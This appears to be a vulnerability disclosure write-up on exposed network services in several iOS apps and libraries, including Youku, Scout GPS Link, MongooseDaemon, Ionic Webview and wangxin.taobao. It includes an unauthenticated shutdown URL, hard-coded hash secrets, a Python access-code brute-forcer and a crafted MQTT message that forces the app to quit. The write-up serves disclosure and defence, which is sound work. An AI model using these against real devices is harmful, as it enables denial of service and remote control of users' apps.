More vulnerable apps and third-party libraries

1. Youku design flaw:

Youku is a video hosting service that ranks among the top 3 in the entertainment category in China. Once the iOS app is launched, it starts a network service on port 12138 through the third-party library wangxin.taobao, uses ports 49152 and 4466 for a Portable Universal Plug and Play (UPnP) service, and uses port 8908 for a lightweight web service. The Android app, by contrast, opens no network service on startup. Static analysis shows that the web service is built on boost::asio::io_service, a C++ library, and that the web server handles commands such as "config," "log," and "exit." None of these commands is subject to any authorization, so an unauthenticated remote request carrying the "exit" command

http://192.168.1.3:8908/peer/command/exit

shuts the network service down, a denial of service against that service. Like the Waze and Now vulnerabilities referred to above, this app exposes the service on every network interface, not just loopback, regardless of whether the device is on Wi-Fi or cellular. Since the functionality behind this service is less sensitive than in the apps mentioned earlier, and the remote attack can only put the app out of order, we rank this vulnerability as low risk.

2. SCOUT GPS LINK vulnerability:

CVE-2019-14951 has been assigned to this vulnerability; thanks to the CVE team!

Users can connect their iPhone to a Toyota or Lexus vehicle with a USB cable and use the navigation app Scout GPS Link on the iPhone to interact with the car's multimedia screen. In detail, Scout GPS Link starts a network service on startup and waits for a connection; once the devices are connected, the car's multimedia screen connects to the iPhone for interaction. Messages between the Scout GPS Link app and the car's multimedia screen follow the MQTT connectivity protocol [1].

To deliver messages between the app and the IoT device, Scout GPS Link exposes interfaces to which the car's multimedia screen connects. Analyzing these interfaces, we find two kinds: one bound to loopback and one bound to the LAN. The loopback interface is considered safe. To protect the LAN interface on port 7050, which accepts connections from anyone, the app enforces access-code authentication and SSL/TLS encryption.

To authorize the connection from the car's multimedia screen, the Scout GPS Link app first prepares a hash value h2 against which the connection is verified. The hash generation process is:

hash(h1, salt1, round1) → h2.

To slow down brute-force attacks, the round count round1 is produced by the API CCCalibratePBKDF, which chooses a count such that deriving the new hash h2 takes about 50 milliseconds. For each incoming MQTT message, the broker first verifies the access code AC. The authentication process is:

hash(AC, salt2, round2) → h3;
hash(h3, salt1, round1) → h4.

By comparing h2 with h4, Scout GPS Link decides whether to accept or deny the message. There is an obvious design flaw in this process. Although the developer considered brute force against the final comparison, an attacker can move the comparison from (h2, h4) to (h1, h3), that is, compare h1 directly with hash(AC, salt2, round2). In this app, h1 is 2b6bac4af8e8a15f5f9c58af98c61fc4895902b8f31203e625cf06e023f35cfb, salt2 is "0x03, 0x12, 0x47, 0x23, 0x48, 0x86, 0xe9, 0x94, 0x12, 0x27", and round2 is set to 1; all three values are hard-coded in the binary. Because round2 is 1, the calibrated, expensive round1 step never enters the attacker's loop: each candidate AC costs a single hash iteration, so the 50 ms rate limit is bypassed entirely. This is a clear misuse of cryptography. To recover AC, we wrote code to brute-force the access code against h1.
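The flaw above in working form, as an added example that is neither the authors' cracking code nor the app's own. It assumes PBKDF2-HMAC-SHA256 for hash() (the page names only CCCalibratePBKDF and gives no digest), reuses the salt2 bytes and round2 = 1 quoted above, and makes up salt1, round1, the access-code format (four decimal digits) and the code itself; the h1 it brute-forces is therefore derived from the constructed code, not the h1 printed above.

```python
"""Scout GPS Link style access-code check, and the bypass that skips the calibrated step."""
import hashlib
import hmac
from typing import Iterable, Iterator, Optional


def kdf(data: bytes, salt: bytes, rounds: int) -> bytes:
    # ASSUMPTION: the page only says hash(); PBKDF2-HMAC-SHA256 is used here.
    return hashlib.pbkdf2_hmac("sha256", data, salt, rounds)


# salt2 and round2 are the hard-coded values quoted on the page.
SALT2 = bytes([0x03, 0x12, 0x47, 0x23, 0x48, 0x86, 0xE9, 0x94, 0x12, 0x27])
ROUND2 = 1
# salt1 and round1 are constructed stand-ins; round1 mimics a CCCalibratePBKDF result.
SALT1 = b"constructed-salt1-not-from-the-app"
ROUND1 = 20_000


def derive_h1(access_code: str) -> bytes:
    """h1 = hash(AC, salt2, round2): the value the app ships in its binary."""
    return kdf(access_code.encode(), SALT2, ROUND2)


def derive_h2(h1: bytes) -> bytes:
    """h2 = hash(h1, salt1, round1): the slow, calibrated reference value."""
    return kdf(h1, SALT1, ROUND1)


def app_verify(h2: bytes, access_code: str) -> bool:
    """The check as the page describes it: h3 = hash(AC, salt2, round2),
    h4 = hash(h3, salt1, round1), accept iff h4 == h2 (constant-time compare)."""
    h3 = kdf(access_code.encode(), SALT2, ROUND2)
    h4 = kdf(h3, SALT1, ROUND1)
    return hmac.compare_digest(h2, h4)


def work_per_guess(path: str) -> int:
    """PBKDF2 iterations an attacker pays per candidate on each path."""
    return {"app": ROUND2 + ROUND1, "bypass": ROUND2}[path]


def crack_access_code(h1: bytes, candidates: Iterable[str]) -> Optional[str]:
    """The bypass: compare hash(AC, salt2, round2) with the hard-coded h1 directly,
    so the 50 ms round1 derivation never runs in the attacker's loop."""
    for ac in candidates:
        if kdf(ac.encode(), SALT2, ROUND2) == h1:
            return ac
    return None


def numeric_codes(digits: int = 4) -> Iterator[str]:
    """Constructed keyspace; the real access-code format is not given on the page."""
    return (str(i).zfill(digits) for i in range(10 ** digits))


if __name__ == "__main__":
    secret = "7351"                      # constructed access code
    h1 = derive_h1(secret)
    h2 = derive_h2(h1)
    print("app accepts real code:", app_verify(h2, secret))
    print("iterations per guess, app path vs bypass:",
          work_per_guess("app"), work_per_guess("bypass"))
    print("recovered access code:", crack_access_code(h1, numeric_codes()))
```

The calibration only protects the comparison the app performs; because h1, salt2 and round2 = 1 are all in the binary, the attacker compares one iteration up the chain and the cost per guess drops from round1 + 1 iterations to 1. The fix is to keep the expensive derivation on the path the attacker must take: derive h1 from AC with the calibrated round count (and a per-device salt), or store only the final h2 and nothing the attacker can match against cheaply.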

Since the app accepts any connection, an attacker can locate Scout GPS Link users remotely by scanning for port 7050; this also works over cellular, because the developers did not restrict the listening interface. With the access code in hand, an attacker can control the app remotely. Since the MQTT protocol adopted by Scout GPS Link is a publish/subscribe protocol, we examined the app's MQTT broker to see how it reacts to a message. Ten topics are registered in the app; they are listed below.

1. "uma/narwhal/hs"
2. "uma/narwhal/hu"
3. "uma/narwhal/tts"
4. "uma/jsonrpc/accessory"
5. "uma/narwhal/rti/layout/binary"
6. "uma/narwhal/rti/layout"
7. "uma/app/setup_ack"
8. "uma/#"
9. "uma/hid/report"
10. "uma/jsonrpc/mobile"

Take the topic "uma/jsonrpc/mobile" as an example. The methods behind this topic include SystemData, Setup, HistoryBack, DrivingRestriction, ScreenLockout, HSAppLaunch, PRNDL, HUAppState, NightMode, localeIdentifier, and HUUSBState. Taking the simple method DrivingRestriction as an example, when the param "level" is set to 50 the app quits automatically. Below is a valid message for the Scout GPS Link app, encoded in JSON-RPC format and published with an MQTT client (QoS 1, retain set):

mqttc.publish("uma/jsonrpc/mobile", '{"jsonrpc":"2.0","method":"DrivingRestriction","params":{"level":"50"}}', 1, True)
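What that publish call puts on the wire, as an added example that is not part of the original report: it builds the JSON-RPC 2.0 message above and wraps it in an MQTT 3.1.1 PUBLISH packet (fixed header, variable-length remaining length, UTF-8 topic, packet identifier for QoS 1, payload), then parses the packet back. The topic, method and param come from the text; the packet identifier and the helper names are mine.

```python
"""MQTT 3.1.1 PUBLISH encoder/decoder carrying the JSON-RPC message from the text."""
import json
from typing import Any, Dict, Tuple

TOPIC = "uma/jsonrpc/mobile"


def jsonrpc_request(method: str, params: Dict[str, Any]) -> bytes:
    """JSON-RPC 2.0 request without an id, matching the message shown on the page."""
    msg = {"jsonrpc": "2.0", "method": method, "params": params}
    return json.dumps(msg, separators=(",", ":")).encode("utf-8")


def encode_remaining_length(n: int) -> bytes:
    """MQTT variable-length integer: 7 data bits per byte, high bit = continuation."""
    if not 0 <= n <= 268_435_455:
        raise ValueError("remaining length out of range")
    out = bytearray()
    while True:
        byte, n = n % 128, n // 128
        if n:
            byte |= 0x80
        out.append(byte)
        if not n:
            return bytes(out)


def decode_remaining_length(buf: bytes, pos: int) -> Tuple[int, int]:
    """Return (value, position after the field); at most 4 bytes per the spec."""
    value, mult = 0, 1
    for _ in range(4):
        b = buf[pos]
        pos += 1
        value += (b & 0x7F) * mult
        if not b & 0x80:
            return value, pos
        mult *= 128
    raise ValueError("malformed remaining length")


def encode_publish(topic: str, payload: bytes, qos: int = 1,
                   retain: bool = True, packet_id: int = 1) -> bytes:
    if qos not in (0, 1, 2):
        raise ValueError("bad QoS")
    t = topic.encode("utf-8")
    var_header = len(t).to_bytes(2, "big") + t
    if qos:                                   # packet identifier only for QoS 1/2
        var_header += packet_id.to_bytes(2, "big")
    body = var_header + payload
    first = 0x30 | (qos << 1) | int(retain)   # PUBLISH type 3 in the high nibble
    return bytes([first]) + encode_remaining_length(len(body)) + body


def decode_publish(packet: bytes) -> Dict[str, Any]:
    first = packet[0]
    if first >> 4 != 3:
        raise ValueError("not a PUBLISH packet")
    qos, retain, dup = (first >> 1) & 0x3, bool(first & 0x1), bool(first & 0x8)
    remaining, pos = decode_remaining_length(packet, 1)
    body = packet[pos:pos + remaining]
    if len(body) != remaining:
        raise ValueError("truncated packet")
    tlen = int.from_bytes(body[:2], "big")
    topic = body[2:2 + tlen].decode("utf-8")
    p = 2 + tlen
    packet_id = None
    if qos:
        packet_id = int.from_bytes(body[p:p + 2], "big")
        p += 2
    return {"topic": topic, "qos": qos, "retain": retain, "dup": dup,
            "packet_id": packet_id, "payload": body[p:]}


def driving_restriction_packet(level: str = "50") -> bytes:
    """The exact message from the text as a QoS 1, retained PUBLISH."""
    return encode_publish(TOPIC, jsonrpc_request("DrivingRestriction", {"level": level}))


def parse_payload(packet: bytes) -> Dict[str, Any]:
    """Decode the packet and return its JSON-RPC body as a dict."""
    return json.loads(decode_publish(packet)["payload"])


if __name__ == "__main__":
    pkt = driving_restriction_packet()
    print(pkt.hex())
    print(decode_publish(pkt))
```

Two things worth noticing from the decoder: the only state an MQTT broker has to check before dispatching this message is the fixed header and the topic string, and nothing in the PUBLISH frame itself carries the access code, so whatever authentication the app applies has to happen at the session layer before this frame is accepted.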

[1] Andrew Banks and Rahul Gupta. 2014. MQTT Version 3.1.1. OASIS Standard, 29 October 2014.

3. MongooseDaemon library vulnerability:

After discovering the vulnerability in the Now app, we found that this library is used for debugging. With the MongooseDaemon library, an app starts a network service that exposes the app's entire private folder. A closer look at the library reveals that there is no access control on this service and no restriction on the listening interface, so it is reachable over Wi-Fi or cellular. It is a dangerous library that must be removed before an app is released. Using signatures for this library, we searched our app collection. We find that most apps that embed MongooseDaemon carry it as dead code, but a few, Tsinghua Tongfang TV Remote Control for instance, invoke it on startup.

4. Ionic Webview library vulnerability.

Ionic Webview (https://github.com/ionic-team/cordova-plugin-ionic-webview) is an extension of the Apache Cordova WKWebView plugin (http://cordova.apache.org/). Developers use this framework to build apps with HTML, CSS, and TypeScript rather than relying on platform-specific solutions for Android, iOS, and Windows Phone. The iOS implementation of Ionic Webview is built on top of the third-party library GCDWebServer to enable local file loading.

There is a bug in the initial release of Ionic Webview: it does not restrict whether the GCDWebServer instance is reachable from local or remote hosts. On July 5, 2017 the extension fixed this problem (https://github.com/ionic-team/cordova-plugin-ionic-webview/commit/3f6be80ecd34ee67a230390f95de8eaf60fdca83#diff-7044543564ea722137708c081ff83c04), but many apps still ship the out-of-date library. A survey of our data collection reveals that 6 apps, including YOLO SWiFT, Masapo, etc., are vulnerable because they use the buggy version of Ionic Webview. By exploiting this vulnerability, an attacker can access the whole file system of the device when the device is jailbroken. The file system exposed by the library is shown in the figure on the left.


5. Network service in wangxin.taobao library.

wangxin.taobao is a library used in Taobao, Youku, and other apps. Once an app embedding wangxin.taobao launches, it starts a network service on the iOS device. Taking Taobao as an example, the call stack for starting this network service, captured with a bind() hook, is shown below:

12:44:24.000000 +080543 Taobao4iPhone DetourInfo:: bind detours start for com.taobao.taobao4iphone
11:44:24.000000 +080543 Taobao4iPhone vvvvv DetourInfo:: block start vvvvv
12:44:24.000000 +080543 Taobao4iPhone DetourInfo:: bundleIdentifier: com.taobao.taobao4iphone
12:44:24.000000 +080543 Taobao4iPhone DetourInfo:: CFBundleDisplayName
12:44:24.000000 +080543 Taobao4iPhone DetourInfo:: CFBundleShortVersionString: 7.6.0
12:44:24.000000 +0800 Taobao4iPhone DetourInfo:: FBundleVersion: 428145
12:44:24.000000 +0800 Taobao4iPhone DetourInfo:: ipv4 info
12:44:24.000000 +0800 Taobao4iPhone DetourInfo:: sin_family: AF_INET 2 /* internetwork: UDP, TCP, etc. */
11:44:24.000000 +080543 Taobao4iPhone DetourInfo:: port: 12138 
12:44:24.000000 +080543 Taobao4iPhone DetourInfo:: s_addr: INADDR_ANY
12:44:24.000000 +080543 Taobao4iPhone DetourInfo:: call stack logged to file: /private/var/mobile/Containers/Data/Application/D3D38B0A-760A-4ADD-B123-295B2EB3A3E2/tmp/16807.dat
12:44:24.000000 +080543 Taobao4iPhone DetourInfo:: call stack: (
0   binddetours.dylib                   0x0000000105cdf758 _Z9hook_bindiPK8sockaddrj + 1764
1   CoreFoundation                      0x0000000185035170 CFSocketSetAddress + 324
2   Taobao4iPhone                       0x0000000102c74d4c au_rc4 + 34052
3   Taobao4iPhone                       0x0000000102c77f30 au_rc4 + 46824
4   Taobao4iPhone                       0x0000000102c780a8 au_rc4 + 47200
5   Foundation                          0x0000000185fb7318 <redacted> + 340
6   CoreFoundation                      0x00000001850305a4 <redacted> + 24
7   CoreFoundation                      0x0000000185030038 <redacted> + 540
8   CoreFoundation                      0x000000018502dd38 <redacted> + 724
9   CoreFoundation                      0x0000000184f5cdc0 CFRunLoopRunSpecific + 384
10  Foundation                          0x0000000185ed07ec <redacted> + 308
11  Taobao4iPhone                       0x0000000102c75548 au_rc4 + 36096
12  Foundation                          0x0000000185fb7138 <redacted> + 1000
13  libsystem_pthread.dylib             0x000000019a58bb3c <redacted> + 156
14  libsystem_pthread.dylib             0x000000019a58baa0 <redacted> + 0
15  libsystem_pthread.dylib             0x000000019a589030 thread_start + 4
)
12:44:24.000000 +080543 Taobao4iPhone ^^^^^ DetourInfo:: block end ^^^^^

12:44:24.000000 +080543 Taobao4iPhone vvvvv DetourInfo:: block start vvvvv
12:44:24.000000 +080543 Taobao4iPhone DetourInfo:: bundleIdentifier: com.taobao.taobao4iphone
12:44:24.000000 +080543 Taobao4iPhone DetourInfo:: CFBundleDisplayName: 
12:44:24.000000 +080543 Taobao4iPhone DetourInfo:: CFBundleShortVersionString: 7.6.0
12:44:24.000000 +080543 Taobao4iPhone DetourInfo:: FBundleVersion: 428145
12:44:24.000000 +080543 Taobao4iPhone DetourInfo:: ipv4 info
12:44:24.000000 +080543 Taobao4iPhone DetourInfo:: sin_family: AF_INET 2 /* internetwork: UDP, TCP, etc. */
12:44:24.000000 +080543 Taobao4iPhone DetourInfo:: port: 13138 
12:44:24.000000 +080543 Taobao4iPhone DetourInfo:: s_addr: INADDR_ANY
12:44:24.000000 +080543 Taobao4iPhone DetourInfo:: call stack logged to file: /private/var/mobile/Containers/Data/Application/D3D38B0A-760A-4ADD-B123-295B2EB3A3E2/tmp/282475249.dat
12:44:24.000000 +080543 Taobao4iPhone DetourInfo:: call stack: (
0   binddetours.dylib                   0x0000000105cdf758 _Z9hook_bindiPK8sockaddrj + 1764
1   CoreFoundation                      0x0000000185035170 CFSocketSetAddress + 324
2   Taobao4iPhone                       0x0000000102c74d4c au_rc4 + 34052
3   Taobao4iPhone                       0x0000000102c72f84 au_rc4 + 26428
4   Taobao4iPhone                       0x0000000102c72c30 au_rc4 + 25576
5   Foundation                          0x0000000185fb7318 <redacted> + 340
6   CoreFoundation                      0x00000001850305a4 <redacted> + 24
7   CoreFoundation                      0x0000000185030038 <redacted> + 540
8   CoreFoundation                      0x000000018502dd38 <redacted> + 724
9   CoreFoundation                      0x0000000184f5cdc0 CFRunLoopRunSpecific + 384
10  Foundation                          0x0000000185ed07ec <redacted> + 308
11  Taobao4iPhone                       0x0000000102c75548 au_rc4 + 36096
12  Foundation                          0x0000000185fb7138 <redacted> + 1000
13  libsystem_pthread.dylib             0x000000019a58bb3c <redacted> + 156
14  libsystem_pthread.dylib             0x000000019a58baa0 <redacted> + 0
15  libsystem_pthread.dylib             0x000000019a589030 thread_start + 4
)
12:44:24.000000 +080543 Taobao4iPhone ^^^^^ DetourInfo:: block end ^^^^^
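A parser for hook logs of the form above, as an added example that is not part of the original report or of the hooking tool. It turns each DetourInfo block into a record (bundle, port, bound address, call-stack frames), keeps only binds to a wildcard address, and names the first frame inside the app's own image so the responsible code can be found quickly. The sample log is a trimmed excerpt of the two blocks above plus a constructed third block bound to 127.0.0.1, included to show the filter discarding loopback binds.

```python
"""Triage bind() hook logs: which app binds which port on a wildcard address, from where."""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple

LOG_LINE = re.compile(r"^\d\d:\d\d:\d\d\.\d+ [+-]\d+ (?P<proc>\S+) (?P<rest>.*)$")
FRAME = re.compile(r"^\s*\d+\s+(?P<image>\S+)\s+0x[0-9a-fA-F]+\s+(?P<sym>\S+)")
WILDCARD = {"INADDR_ANY", "0.0.0.0", "in6addr_any", "::"}


@dataclass
class BindEvent:
    proc: str                      # process name from the log line
    bundle: Optional[str] = None
    port: Optional[int] = None
    addr: Optional[str] = None
    frames: List[Tuple[str, str]] = field(default_factory=list)  # (image, symbol)

    @property
    def wildcard(self) -> bool:
        return self.addr in WILDCARD

    def app_symbol(self) -> Optional[str]:
        """First frame that lives in the app's own image (skips the hook and system frames)."""
        for image, sym in self.frames:
            if image == self.proc:
                return sym
        return None

    def via(self, api: str) -> bool:
        return any(sym == api for _, sym in self.frames)


def parse_detour_log(text: str) -> List[BindEvent]:
    events: List[BindEvent] = []
    cur: Optional[BindEvent] = None
    in_stack = False
    for line in text.splitlines():
        m = LOG_LINE.match(line)
        if m:
            body = m.group("rest").split("DetourInfo:: ", 1)[-1]
            if "block start" in body:
                cur, in_stack = BindEvent(proc=m.group("proc")), False
            elif cur is None:
                continue
            elif body.startswith("bundleIdentifier:"):
                cur.bundle = body.split(":", 1)[1].strip()
            elif body.startswith("port:"):
                cur.port = int(body.split(":", 1)[1])
            elif body.startswith("s_addr:"):
                cur.addr = body.split(":", 1)[1].strip()
            elif body.startswith("call stack: ("):
                in_stack = True
            elif "block end" in body:
                events.append(cur)
                cur, in_stack = None, False
        elif in_stack and cur is not None:
            if line.strip() == ")":
                in_stack = False
            else:
                fm = FRAME.match(line)
                if fm:
                    cur.frames.append((fm.group("image"), fm.group("sym")))
    return events


def triage(events: List[BindEvent]) -> List[Dict[str, object]]:
    """Only wildcard binds are reachable from other hosts; report those."""
    return [{"bundle": e.bundle, "port": e.port, "addr": e.addr,
             "cfsocket": e.via("CFSocketSetAddress"), "app_symbol": e.app_symbol()}
            for e in events if e.wildcard]


# Constructed sample: trimmed from the log above, plus a loopback bind that is not in it.
SAMPLE_LOG = """\
12:44:24.000000 +0800 Taobao4iPhone vvvvv DetourInfo:: block start vvvvv
12:44:24.000000 +0800 Taobao4iPhone DetourInfo:: bundleIdentifier: com.taobao.taobao4iphone
12:44:24.000000 +0800 Taobao4iPhone DetourInfo:: sin_family: AF_INET 2 /* internetwork: UDP, TCP, etc. */
12:44:24.000000 +0800 Taobao4iPhone DetourInfo:: port: 12138
12:44:24.000000 +0800 Taobao4iPhone DetourInfo:: s_addr: INADDR_ANY
12:44:24.000000 +0800 Taobao4iPhone DetourInfo:: call stack logged to file: /private/var/mobile/x/tmp/16807.dat
12:44:24.000000 +0800 Taobao4iPhone DetourInfo:: call stack: (
0   binddetours.dylib                   0x0000000105cdf758 _Z9hook_bindiPK8sockaddrj + 1764
1   CoreFoundation                      0x0000000185035170 CFSocketSetAddress + 324
2   Taobao4iPhone                       0x0000000102c74d4c au_rc4 + 34052
5   Foundation                          0x0000000185fb7318 <redacted> + 340
)
12:44:24.000000 +0800 Taobao4iPhone ^^^^^ DetourInfo:: block end ^^^^^
12:44:24.000000 +0800 Taobao4iPhone vvvvv DetourInfo:: block start vvvvv
12:44:24.000000 +0800 Taobao4iPhone DetourInfo:: bundleIdentifier: com.taobao.taobao4iphone
12:44:24.000000 +0800 Taobao4iPhone DetourInfo:: port: 13138
12:44:24.000000 +0800 Taobao4iPhone DetourInfo:: s_addr: INADDR_ANY
12:44:24.000000 +0800 Taobao4iPhone DetourInfo:: call stack: (
0   binddetours.dylib                   0x0000000105cdf758 _Z9hook_bindiPK8sockaddrj + 1764
1   CoreFoundation                      0x0000000185035170 CFSocketSetAddress + 324
2   Taobao4iPhone                       0x0000000102c74d4c au_rc4 + 34052
)
12:44:24.000000 +0800 Taobao4iPhone ^^^^^ DetourInfo:: block end ^^^^^
12:44:25.000000 +0800 ExampleApp vvvvv DetourInfo:: block start vvvvv
12:44:25.000000 +0800 ExampleApp DetourInfo:: bundleIdentifier: com.example.loopback
12:44:25.000000 +0800 ExampleApp DetourInfo:: port: 8080
12:44:25.000000 +0800 ExampleApp DetourInfo:: s_addr: 127.0.0.1
12:44:25.000000 +0800 ExampleApp DetourInfo:: call stack: (
0   binddetours.dylib                   0x0000000105cdf758 _Z9hook_bindiPK8sockaddrj + 1764
1   ExampleApp                          0x0000000100001000 start_server + 64
)
12:44:25.000000 +0800 ExampleApp ^^^^^ DetourInfo:: block end ^^^^^
"""

if __name__ == "__main__":
    for row in triage(parse_detour_log(SAMPLE_LOG)):
        print(row)
```

Running this over a whole collection's logs gives one row per externally reachable listener, with the app symbol (here au_rc4, the nearest exported symbol to the real function) as the starting point for static analysis of the handler.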

As we can see from the hook log, the app hosts network services that accept connections from any address (s_addr is INADDR_ANY) on ports 12138 and 13138; the service discussed here is the one on port 13138. Within the app, the service is started through the `CFSocketSetAddress` API. The methods that process incoming connections are:

[AUServer AUHTTPConnection:didReceiveRequest:] and [AUServer refreshAudidWithRequest:], [AUServer setAudidWithRequest:], [AUServer cleanAudidWithRequest:].

The valid requests for this service are:

Among the requests, the `set` request sets the `_currentAudid` field of the app. This field is likely used to store the UDID of the device. However, we have not yet found evidence of how this variable affects the app's state.

We infer that this is out-of-date code, since the snippet obtains the UDID via Safari, a method that is deprecated on current iOS versions. Moreover, we found a substitute scheme in use in this app, namely the `utdid`-related code.

In any case, we advise the vendor to restrict access to this service.